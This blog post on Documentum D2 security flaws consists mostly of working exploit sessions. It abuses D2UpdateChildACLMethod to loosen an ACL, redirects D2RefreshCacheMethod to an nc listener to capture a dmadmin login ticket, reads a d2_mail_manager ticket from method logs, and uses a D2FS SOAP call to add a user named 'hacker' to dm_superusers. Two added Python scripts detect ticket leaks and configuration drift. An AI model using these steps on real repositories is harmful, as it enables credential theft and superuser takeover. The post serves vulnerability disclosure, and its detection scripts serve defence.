Second dive into D2 security

Read the previous one.

D2UpdateChildACLMethod

API> retrieve,c,dm_acl where object_name='dm_acl_superusers'
...
45022483800001bc
API> dump,c,45022483800001bc
...
USER ATTRIBUTES

  object_name                     : dm_acl_superusers
  description                     : ACL of superusers used for Docbase Administration
  owner_name                      : d2
  globally_managed                : F
  acl_class                       : 0

SYSTEM ATTRIBUTES

  r_is_internal                   : F
  r_accessor_name              [0]: dm_world
                               [1]: dm_owner
                               [2]: admingroup
  r_accessor_permit            [0]: 1
                               [1]: 7
                               [2]: 7
  r_accessor_xpermit           [0]: 0
                               [1]: 0
                               [2]: 0
  r_is_group                   [0]: F
                               [1]: F
                               [2]: T
  r_has_events                    : F
  r_permit_type                [0]: 0
                               [1]: 0
                               [2]: 0
  r_application_permit         [0]:
                               [1]:
                               [2]:
  r_template_id                   : 0000000000000000
  r_alias_set_id                  : 0000000000000000
  r_object_id                     : 45022483800001bc

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_has_required_groups           : F
  i_has_required_group_set        : F
  i_has_access_restrictions       : F
  i_partition                     : 0
  i_is_replica                    : F
  i_vstamp                        : 0

API> retrieve,c,dm_method where object_name='dm_GroupRename'
...
[DM_API_E_NO_MATCH]error:  
   "There was no match in the docbase for the qualification: 
      dm_method where object_name='dm_GroupRename'"

API> create,c,d2_acl_config
...
000224838000012b
API> set,c,l,object_name
SET> ACL of superusers used for Docbase Administration
...
OK
API> append,c,l,accessor_name
SET> dm_world
...
OK
API> append,c,l,condition_attr_name
SET>
...
OK
API> append,c,l,condition_attr_value
SET>
...
OK
API> append,c,l,accessor_permit
SET> 7
...
OK
API> append,c,l,accessor_xpermit
SET> 0
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2UpdateChildACLMethod,
     ARGUMENTS,S,'
       -docbase_name d2 
       -password "" 
       -acl_config_name "ACL of superusers used for Docbase Administration"
     '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> retrieve,c,dm_method where object_name='dm_GroupRename'
...
100224838000056e
API> get,c,l,_permit
...
7

D2RefreshCacheMethod

nc:

nc -l 7777

api:

API> create,c,d2_options
...
000224838000012c
API> append,c,l,client_urls
SET> http://localhost:7777/
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2RefreshCacheMethod,
     ARGUMENTS,S,'-docbase_name d2 -password "" -all true',SAVE_RESULTS,B,T
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0902248380002c87
  result_doc_id                   : 0902248380002c87
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> getpath,c,0902248380002c87
...
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/0a/b6.txt
API> quit
Bye
 ~]$ cat content_storage_01/00022483/80/00/0a/b6.txt
==== START ======================================================================
...............
Refresh cache URL http://localhost:7777/servlet/..._password=DM_TICKET%3DT0...

nc:

GET /servlet/RefreshCache?_docbase=d2&_username=dmadmin&_password=DM_TICKET%3DT0... HTTP/1.1
User-Agent: Java/1.7.0_51
Host: localhost:7777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

D2WF{LaunchScheduledWorkflows, LifeCycle, ReceiveTaskMail, SendTaskMail}Method

If we execute the method with SAVE_RESULTS=T, we can get the user's ticket:

==== START =======================================================
D2-API v4.2.0010 build 378
DFC version : 7.1.0020.0120
file.encoding : UTF-8
Arguments : ...
User  : d2_mail_manager
Domain  :
User password : DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9u...
New session manager creation.
Session manager set identity.
Session manager get session.
Tasks found : 0
==== END (0.166s) ================================================
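
To find which saved method results and logs already carry a login ticket, and for which account, the two forms shown above (the "User password" log field and the `_password` URL parameter) can be scanned for and redacted. This is an added example, not code from the original post or from D2; the function names are hypothetical and the sample text is constructed with a placeholder ticket value.

```python
import re

# A login ticket as it appears in the outputs above: plain after "=",
# or percent-encoded ("%3D") when it travels inside a URL.
TICKET_RE = re.compile(r"DM_TICKET(=|%3[Dd])[A-Za-z0-9+/=%]+")
USER_LINE_RE = re.compile(r"^User\s*:\s*(\S+)")        # "User  : d2_mail_manager"
URL_USER_RE = re.compile(r"[?&]_username=([^&\s]+)")   # "...&_username=dmadmin&..."

def find_ticket_leaks(text):
    """Return (line_no, account, form) for every ticket found in text."""
    leaks, last_user = [], None
    for line_no, line in enumerate(text.splitlines(), 1):
        m = USER_LINE_RE.match(line)
        if m:
            last_user = m.group(1)  # account named by the method log header
        for t in TICKET_RE.finditer(line):
            if line[:t.start()].endswith("_password="):
                u = URL_USER_RE.search(line)
                leaks.append((line_no, u.group(1) if u else None, "url-parameter"))
            else:
                leaks.append((line_no, last_user, "log-field"))
    return leaks

def redact(text):
    """Replace every ticket body, keeping the marker so the leak stays visible."""
    return TICKET_RE.sub(lambda m: "DM_TICKET" + m.group(1) + "<redacted>", text)

# Constructed sample: the ticket value is a placeholder, not a real ticket.
SAMPLE = """\
User  : d2_mail_manager
User password : DM_TICKET=Q09OU1RSVUNURUQ=
Refresh cache URL http://localhost:7777/servlet/RefreshCache?_docbase=d2&_username=dmadmin&_password=DM_TICKET%3DQ09OU1RSVUNURUQ%3D
Tasks found : 0
"""

if __name__ == "__main__":
    for line_no, account, form in find_ticket_leaks(SAMPLE):
        print(f"line {line_no}: ticket for {account} exposed as {form}")
    print(redact(SAMPLE))
```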

D2FS

api:

API> retrieve,c,dm_user where user_name='hacker'
...
1102248380000541
API> retrieve,c,d2_options
...
000224838000012c
API> dump,c,l
...
USER ATTRIBUTES

  config_security_group           :
  client_security_group           :
  node_admin_security_group       : admingroup
  forbidden_copy                []: <none>
  client_urls                   []: <none>
  enable_compare                  : F
  attribute_list_display_mode     : 0
  node_user_security_group        : admingroup
  node_group_security_group       : admingroup
  node_group_user_parent          : node_admin
  node_group_display_all          : T
  dfc_validator                   : T
  in_create_config              []: <none>
  url_allowed_actions           []: <none>
  lock_config                     : F

SYSTEM ATTRIBUTES

  r_object_id                     : 000224838000012c

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_is_replica                    : F
  i_vstamp                        : 2

API> set,c,l,node_user_security_group
SET>
...
OK
API> save,c,l
...
OK

soap:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
           xmlns:con="http://www.emc.com/d2fs/services/content_service"
           xmlns:com="http://www.emc.com/d2fs/models/common"
           xmlns:prop="http://www.emc.com/d2fs/services/property_service" 
           xmlns:att="http://www.emc.com/d2fs/models/attribute"
           xmlns:con1="http://www.emc.com/d2fs/models/context">
   <soapenv:Header/>
   <soapenv:Body>
      <prop:savePropertiesRequest com:id="1102248380000541" >
         <con1:context uid="2" login="hacker" password="hacker">
                <con1:repository com:id="2" repositoryName="d2" serverVersion="7"
                                 repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
         <!--Zero or more repetitions:-->
         <att:attributes name="list" type="2" value="group_membership" />
         <att:attributes name="user_group_name" type="2" value="dm_superusers" />
      </prop:savePropertiesRequest>
   </soapenv:Body>
</soapenv:Envelope>

api:

API> retrieve,c,dm_group where group_name='dm_superusers'
...
1202248380000101
API> dump,c,l
...
USER ATTRIBUTES

  group_name                      : dm_superusers
  group_address                   :
  users_names                  [0]: hacker
  groups_names                 [0]: dm_superusers_dynamic
                               [1]: dcs_privileged_users
  owner_name                      : d2
  is_private                      : F
  description                     :
  globally_managed                : F
  alias_set_id                    : 0000000000000000
  group_source                    :
  group_class                     : privilege group
  group_admin                     :
  is_dynamic                      : F
  is_dynamic_default              : F
  group_global_unique_id          : d2:dm_superusers
  group_native_room_id            : 0000000000000000
  group_directory_id              : 0000000000000000
  group_display_name              : dm_superusers
  is_protected                    : F
  is_module_only                  : F

SYSTEM ATTRIBUTES

  r_modify_date                   : 4/19/2014 22:54:42
  r_has_events                    : F
  r_object_id                     : 1202248380000101

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_all_users_names            [0]: hacker
  i_supergroups_names          [0]: dm_superusers
  i_nondyn_supergroups_names   [0]: dm_superusers
  i_is_replica                    : F
  i_vstamp                        : 4
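
The d2_options changes made in the sessions above (a client_urls entry added, node_user_security_group cleared) are visible in a plain dump, so comparing periodic dumps against a known-good baseline detects them. This is an added example, not code from the original post or from D2; the function names are hypothetical, the baseline values are the ones in this page's test repository dump (a real deployment's baseline is an assumption to fill in), and the sample dump is constructed.

```python
import re

# One line of iapi dump output: "name : value", "name [0]: value", a
# continuation "[1]: value", or an empty repeating attribute "name []: <none>".
LINE_RE = re.compile(r"^\s*(?P<name>\w+)?\s*(?:\[(?P<idx>\d*)\])?\s*:\s*(?P<val>.*)$")

def parse_dump(text):
    """Parse dump output into {attribute: str} or {attribute: [values]}."""
    attrs, current = {}, None
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or (m["name"] is None and m["idx"] is None):
            continue                      # section header, prompt, blank line
        if m["name"]:
            current = m["name"]
            if m["idx"] is None:          # single-valued attribute
                attrs[current] = m["val"].strip()
                continue
            attrs[current] = []           # repeating attribute starts here
        if m["idx"] and isinstance(attrs.get(current), list):
            attrs[current].append(m["val"].strip())
    return attrs

def drift(attrs, baseline):
    """Return {attribute: (expected, actual)} for values that left the baseline."""
    return {k: (v, attrs.get(k)) for k, v in baseline.items() if attrs.get(k) != v}

# Baseline taken from the unmodified d2_options dump on this page (test repository).
BASELINE = {
    "node_admin_security_group": "admingroup",
    "node_user_security_group": "admingroup",
    "node_group_security_group": "admingroup",
    "client_urls": [],
}

# Constructed sample: d2_options as it would dump after both changes above.
SAMPLE = """\
USER ATTRIBUTES
  node_admin_security_group       : admingroup
  forbidden_copy                []: <none>
  client_urls                  [0]: http://localhost:7777/
  node_user_security_group        :
  node_group_security_group       : admingroup
"""

if __name__ == "__main__":
    for name, (expected, actual) in drift(parse_dump(SAMPLE), BASELINE).items():
        print(f"{name}: expected {expected!r}, found {actual!r}")
```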

One thought on “Second dive into D2 security”

  1. Pingback: CVE-2015-0518. Was it really fixed? | Documentum in a (nuts)HELL
